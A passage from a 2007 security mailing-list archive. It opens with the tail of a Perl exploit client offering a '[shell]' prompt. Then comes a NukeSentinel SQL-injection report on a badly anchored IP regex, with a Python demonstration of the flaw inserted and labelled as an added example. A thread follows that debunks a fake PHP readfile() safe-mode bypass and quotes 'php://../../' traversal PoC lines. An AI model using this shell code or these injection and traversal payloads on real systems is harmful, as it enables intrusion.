print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;
}

From gmdarkfig at gmail.com Sat Mar 31 12:55:25 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Sat, 31 Mar 2007 14:55:25 +0200
Subject: [VIM] Fwd: SQL injection (x2) in NukeSentinel
Message-ID:

NukeSentinel 2.5.05:

Code:
if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip']))
{ $nsnst_const['remote_ip'] = "none"; }

Results: File Disclosure (with a nice sql injection) + SQL Injection
(includes/nsbypass.php)

NukeSentinel 2.5.06 (they added ^ but they forgot to add $):

Code:
if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip']))
{ $nsnst_const['remote_ip'] = "none"; }

Results: SQL Injection (includes/nukesentinel.php / includes/nsbypass.php)

NukeSentinel 2.5.07 (includes/nukesentinel.php corrected):

Code:
if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})$", $nsnst_const['remote_ip']))
{ $nsnst_const['remote_ip'] = "none"; }

There is always the SQL Injection in includes/nsbypass.php.
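The three ereg() checks from the NukeSentinel releases above, replayed as an added example (not from the post, nor NukeSentinel's own code): Python's re.search stands in for PHP's unanchored ereg(), the sample values are constructed, and that remote_ip is client-influenced is an assumption the post does not state.

```python
import ipaddress
import re

# The ereg() patterns quoted in the post for each NukeSentinel release,
# transcribed from PHP double-quoted strings ("\\." is the literal "\.").
PATTERNS = {
    "2.5.05": r"([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})",
    "2.5.06": r"^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})",
    "2.5.07": r"^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$",
}


def nukesentinel_remote_ip(version: str, value: str) -> str:
    """Mirror the quoted check: keep the value if ereg() matches, else "none".

    PHP's ereg() is an unanchored search, so re.search() is the closest
    Python equivalent; any anchoring has to come from the pattern itself.
    """
    return value if re.search(PATTERNS[version], value) else "none"


def strict_ipv4(value: str) -> bool:
    """A validator that does not depend on regex anchoring: the whole string
    must parse as a dotted-quad IPv4 address, which also rejects
    out-of-range octets such as 999 that all three regexes accept."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


# Constructed sample values (not from the post). Assumption: remote_ip is
# derived from something the client can influence, so it may carry more
# than a bare address.
SAMPLES = {
    "clean": "192.0.2.10",
    # A valid address followed by a stray quote: passes a ^-only anchor,
    # and the quote then reaches whatever query the value is used in.
    "trailing_quote": "192.0.2.10'",
    # An address buried inside other text: passes only the unanchored form.
    "embedded": "x 192.0.2.10 y",
    # Syntactically a dotted quad, numerically impossible: passes all three.
    "out_of_range": "999.999.999.999",
}


def evaluate() -> dict:
    """Return {version: {sample_name: value stored as remote_ip}}."""
    return {
        version: {name: nukesentinel_remote_ip(version, value)
                  for name, value in SAMPLES.items()}
        for version in PATTERNS
    }


def versions_accepting(sample_name: str) -> list:
    """Which releases let this sample through unchanged."""
    return [v for v, row in evaluate().items() if row[sample_name] != "none"]


if __name__ == "__main__":
    for version, row in evaluate().items():
        print(version)
        for name, stored in row.items():
            print(f"  {name:15s} -> {stored!r}")
    print("strict_ipv4:", {n: strict_ipv4(v) for n, v in SAMPLES.items()})
```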
URL: http://www.attrition.org/pipermail/vim/attachments/20070331/cfaa572a/attachment.html

From gmdarkfig at gmail.com Sat Mar 31 13:06:15 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Sat, 31 Mar 2007 15:06:15 +0200
Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
Message-ID:

readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
Author: ThE-WoLf-KsA
Advisory: http://www.milw0rm.com/exploits/3573

The guy copied an article from SecurityReason:
error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
http://securityreason.com/achievement_securityalert/41

He changed the title, the author's name, the function, and that's all.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.attrition.org/pipermail/vim/attachments/20070331/7e6443f3/attachment.html

From str0ke at milw0rm.com Sat Mar 31 13:11:57 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sat, 31 Mar 2007 08:11:57 -0500
Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
In-Reply-To:
References:
Message-ID: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com>

Darkfig,

This wasn't on their site when I posted it on milw0rm. Was it a leak'ing problem?

/str0ke

On 3/31/07, GM darkfig wrote:
> readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
> Author: ThE-WoLf-KsA
> Advisory: http://www.milw0rm.com/exploits/3573
>
> The guy copied an article from SecurityReason:
> error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
> http://securityreason.com/achievement_securityalert/41
>
> He changed the title, the author's name, the function, and that's all.
From str0ke at milw0rm.com Sat Mar 31 13:13:01 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sat, 31 Mar 2007 08:13:01 -0500
Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
In-Reply-To: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com>
References: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com>
Message-ID: <814b9d50703310613u44eeaf31nb716002d3819591@mail.gmail.com>

No matter, different vulnerability I'm thinking of. Thanks for the heads up.

/str0ke

On 3/31/07, str0ke wrote:
> Darkfig,
>
> This wasn't on their site when I posted it on milw0rm. Was it a
> leak'ing problem?
>
> /str0ke
>
> On 3/31/07, GM darkfig wrote:
> > readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
> > Author: ThE-WoLf-KsA
> > Advisory: http://www.milw0rm.com/exploits/3573
> >
> > The guy copied an article from SecurityReason:
> > error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
> > http://securityreason.com/achievement_securityalert/41
> >
> > He changed the title, the author's name, the function, and that's all.
>

From gmdarkfig at gmail.com Sat Mar 31 13:32:23 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Sat, 31 Mar 2007 15:32:23 +0200
Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
Message-ID:

The readfile() vulnerability doesn't exist. For example, the poc:
", 3,"php://../../".$file); ?>

Quote from php.net:
int readfile ( string $filename [, bool $use_include_path [, resource $context]] )

The first argument isn't a filename, the second is not a bool (true/false).
The code quoted by the author is the code of the error_log function, not the readfile function. In his poc he just changed the function.

Quote from SecurityReason:
- --- 2. Exploit ---
$file=""; # FILENAME
error_log("", 3, "php://../../".$file);
?>

Quote from the fake:
- --- 2. Exploit ---
$file=""; # FILENAME
readfile("", 3, "php://../../".$file);
?>

This will not work.
From str0ke at milw0rm.com Sat Mar 31 13:36:44 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sat, 31 Mar 2007 08:36:44 -0500
Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
In-Reply-To:
References:
Message-ID: <814b9d50703310636p30315418s8bf8e64d0dead83a@mail.gmail.com>

Got ya brotha. Removing the exploit #id.

/str0ke

On 3/31/07, GM darkfig wrote:
> The readfile() vulnerability doesn't exist. For example, the poc:
> ", 3,"php://../../".$file); ?>
>
> Quote from php.net:
> int readfile ( string $filename [, bool $use_include_path [, resource
> $context]] )
>
> The first argument isn't a filename, the second is not a bool (true/false).
> The code quoted by the author is the code of the error_log function,
> not the readfile function. In his poc he just changed the function.
>
> Quote from SecurityReason:
> - --- 2. Exploit ---
> $file=""; # FILENAME
> error_log("", 3,
> "php://../../".$file);
> ?>
>
> Quote from the fake:
> - --- 2. Exploit ---
> $file=""; # FILENAME
> readfile("", 3,
> "php://../../".$file);
> ?>
>
> This will not work.
>